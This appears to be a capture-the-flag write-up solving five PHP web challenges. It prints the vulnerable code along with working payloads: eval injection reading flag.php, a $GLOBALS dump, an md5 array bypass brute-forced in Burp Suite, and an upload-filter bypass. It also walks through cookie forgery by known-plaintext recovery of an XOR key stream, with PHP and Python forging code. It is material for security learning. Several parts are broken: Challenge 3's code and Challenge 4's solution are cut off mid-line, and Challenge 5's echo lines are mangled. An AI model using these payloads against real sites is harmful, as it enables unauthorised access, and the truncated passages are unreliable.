Challenge 1: Brute force-1, the flag is in a certain six-character variable
<?php
include "flag.php";
$a = @$_REQUEST['hello'];
if(!preg_match('/^\w*$/',$a )){
    die('ERROR');
}
eval("var_dump($$a);");   // $$a: variable variable, so hello=GLOBALS dumps $GLOBALS
show_source(__FILE__);
?>
Solution: URL/?hello=GLOBALS
Challenge 2: Brute force-2, the flag is not in a variable
<?php
include "flag.php";
$a = @$_REQUEST['hello'];
eval( "var_dump($a);");   // $a is interpolated unfiltered into the eval'd code
show_source(__FILE__);
Solution: URL/?hello=file_get_contents('flag.php')
Challenge 3: Brute force-3, this one really is brute force
<?php
error_reporting(0);
session_start();
require('./flag.php');
if(!isset($_SESSION['nums'])){
    $_SESSION['nums'] = 0;
    $_SESSION['time'] = time();
    $_SESSION['whoami'] = 'ea';
}
if($_SESSION['time']+120
Solution: md5() returns an empty value when it is given an array, so use URL/?value[]=e&value[]=a and brute force with Burp Suite; the steps are shown in the figure:
Challenge 4: Upload, upload whatever you like, it is that permissive (tip: the flag is in flag.php)
File upload
You can upload any file
<?php if($_SERVER["REQUEST_METHOD"] === "POST") : ?>
<?php if (is_uploaded_file($_FILES["file"]["tmp_name"])):
    $file = $_FILES['file'];
    $name = $file['name'];
    // file name must be alphanumeric with a single extension
    if (preg_match("/^[a-zA-Z0-9]+\\.[a-zA-Z0-9]+$/", $name) ):
        $data = file_get_contents($file['tmp_name']);
        // strip "<?" and lowercase "php" until nothing changes
        while($next = preg_replace("/<\\?/", "", $data)){
            $next = preg_replace("/php/", "", $next);
            if($data === $next) break;
            $data = $next;
        }
        file_put_contents(dirname(__FILE__) . '/u/' . $name, $data);
        chmod(dirname(__FILE__) . '/u/' . $name, 0644);
?>
<?php
    endif;
endif;
?>
<?php
endif;
?>
Solution: the uploaded file is filtered for “php” and “<?”; use uppercase PHP and
Challenge 5: Code, a brain-teaser, can you get past it?
Solution: visit URL/index.php?jpg=hei.jpg; viewing the source shows
if(! isset($_GET['jpg']))
    header('Refresh:0;url=./index.php?jpg=hei.jpg');
$file = $_GET['jpg'];
echo '
echo "";
/*
* Can you find the flag file?
*
*/
?>
The “Created by PhpStorm” comment suggests the project was created with PhpStorm, so an auto-generated .idea directory probably exists and may leak source. Visiting URL/.idea/workspace.xml shows three files: index.php, config.php and fl3g_ichuqiu.php. Combined with the code of index.php, requesting URL/index.php?jpg=fl3gconfigichuqiu.php and applying base64_decode yields the source of fl3g_ichuqiu.php:
<?php
/**
 * Created by PhpStorm.
 * Date: 2015/11/16
 * Time: 1:31
 */
error_reporting(E_ALL || ~E_NOTICE);
include('config.php');   // defines $key and $flag
function random($length, $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz') {
    $hash = '';
    $max = strlen($chars) - 1;
    for($i = 0; $i < $length; $i++) {
        $hash .= $chars[mt_rand(0, $max)];
    }
    return $hash;
}
function encrypt($txt,$key){
    $tmp = '';
    // shift every byte of the plaintext by +10
    for($i=0;$i<strlen($txt);$i++){
        $tmp .= chr(ord($txt[$i])+10);
    }
    $txt = $tmp;
    $rnd=random(4);
    $key=md5($rnd.$key);   // 32 hex characters used as the XOR key stream
    $s=0;
    $ttmp = '';
    for($i=0;$i<strlen($txt);$i++){
        if($s == 32) $s = 0;
        $ttmp .= $txt[$i] ^ $key[++$s];   // ++$s: key index 0 is never used
    }
    return base64_encode($rnd.$ttmp);
}
function decrypt($txt,$key){
    $txt=base64_decode($txt);
    $rnd = substr($txt,0,4);
    $txt = substr($txt,4);
    $key=md5($rnd.$key);
    $s=0;
    $tmp = '';
    for($i=0;$i<strlen($txt);$i++){
        if($s == 32) $s = 0;
        $tmp .= $txt[$i]^$key[++$s];
    }
    $tmp1 = '';
    for($i=0;$i<strlen($tmp);$i++){
        $tmp1 .= chr(ord($tmp[$i])-10);
    }
    return $tmp1;
}
$username = decrypt($_COOKIE['user'],$key);
if ($username == 'system'){
    echo $flag;
}else{
    setcookie('user',encrypt('guest',$key));
    echo "╮(╯▽╰)╭";
}
?>
Visiting URL/fl3g_ichuqiu.php sets a cookie named user whose value is the encryption of 'guest'. After base64_decode, the first 4 characters of the cookie are the random $rnd, and the remaining 5 characters are $newtxt (the plaintext after chr(ord($txt[$i])+10)) XORed with 5 characters of $newkey (md5($rnd.$key)). So XORing those 5 characters with $newtxt recovers the corresponding 5 characters of $newkey. Because 'system' has 6 characters, the 6th character of $newkey is unknown and has to be tried over the 16 characters 0-9 and a-f in turn: each character of 'system' is shifted with chr(ord($txt[$i])+10), XORed with the 6 key characters, and the result is base64-encoded and used as the cookie value; the 16 candidates are then checked one by one. Below are the code that generates the cookie values and the screenshots of the brute force with Burp Suite:
<?php
$oriStr = base64_decode('bkFVMxAaWUxK'); // bkFVMxAaWUxK is the cookie value produced by visiting fl3g_ichuqiu.php
$rnd = substr($oriStr, 0, 4);
$a = substr($oriStr, 4);
$b = 'guest';
$ttmp = '';
// known plaintext: ciphertext XOR shifted 'guest' = the 5 key-stream characters
for($i=0;$i<strlen($b);$i++){
    $ttmp .= chr(ord($b[$i])+10) ^ $a[$i];
}
$d = 'system';
$char1 = range(0, 9);
$char2 = range('a', 'f');
$char = array_merge($char1, $char2);   // the 16 possible values of the 6th key-stream character
foreach ($char as $v) {
    $c = $ttmp.$v;
    $newStr = '';
    for($i=0;$i<strlen($d);$i++){
        $newStr .= $c[$i] ^ chr(ord($d[$i])+10);
    }
    echo base64_encode($rnd.$newStr).PHP_EOL;
}
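The weakness in fl3g_ichuqiu.php is that the XOR key stream depends only on the 4 public bytes $rnd and a fixed $key, so one known plaintext ('guest') leaks the key stream and a longer target costs only 16 guesses for the missing hex digit. The following Python re-implementation of the page's scheme is an added example, not code from the challenge or the writeup; the server key "constructed-secret" is a placeholder chosen here.

```python
import base64
import hashlib
import secrets
import string

ALPHABET = string.ascii_uppercase + string.digits + string.ascii_lowercase  # PHP random() charset
HEX = "0123456789abcdef"  # every md5 hex char is one of these, hence 16 guesses per missing byte

def shift(data: bytes, delta: int) -> bytes:
    """The PHP chr(ord($c)+10) / chr(ord($c)-10) loops, byte-wise."""
    return bytes((b + delta) & 0xFF for b in data)

def keystream(rnd: str, key: str) -> bytes:
    """md5($rnd.$key) as the 32-char hex string the PHP indexes into."""
    return hashlib.md5((rnd + key).encode()).hexdigest().encode()

def xor_keystream(data: bytes, ks: bytes) -> bytes:
    """Mirror $key[++$s]: hex chars 1,2,3,... are used, index 0 never (inputs here are short)."""
    return bytes(b ^ ks[i + 1] for i, b in enumerate(data))

def encrypt(txt: str, key: str, rnd: str = "") -> str:
    rnd = rnd or "".join(secrets.choice(ALPHABET) for _ in range(4))
    body = xor_keystream(shift(txt.encode(), 10), keystream(rnd, key))
    return base64.b64encode(rnd.encode() + body).decode()

def decrypt(token: str, key: str) -> str:
    raw = base64.b64decode(token)
    rnd, body = raw[:4].decode(), raw[4:]
    return shift(xor_keystream(body, keystream(rnd, key)), -10).decode("latin-1")

def recover_keystream(token: str, known_plain: str) -> tuple:
    """Known plaintext: body = shift(plain) XOR ks, so body XOR shift(plain) = ks[1..n]."""
    raw = base64.b64decode(token)
    prefix = bytes(c ^ p for c, p in zip(raw[4:], shift(known_plain.encode(), 10)))
    return raw[:4].decode(), prefix

def forge_candidates(token: str, known_plain: str, target: str) -> list:
    """target is one byte longer than known_plain: the missing key-stream byte is a hex digit."""
    rnd, prefix = recover_keystream(token, known_plain)
    shifted = shift(target.encode(), 10)
    return [base64.b64encode(rnd.encode() + bytes(a ^ b for a, b in zip(shifted, prefix + h.encode()))).decode()
            for h in HEX]

def demo(server_key: str = "constructed-secret") -> dict:
    """Constructed server key: a single 'guest' cookie lets exactly one of 16 forgeries decrypt to 'system'."""
    guest_cookie = encrypt("guest", server_key)
    cands = forge_candidates(guest_cookie, "guest", "system")
    accepted = [c for c in cands if decrypt(c, server_key) == "system"]
    return {"candidates": len(cands), "accepted": len(accepted)}
```

Run against the page's real cookie bkFVMxAaWUxK, recover_keystream returns $rnd "nAU3" and the 5 recovered key-stream characters are all hex digits, which is the sanity check that the known-plaintext step is right before spending the 16 guesses.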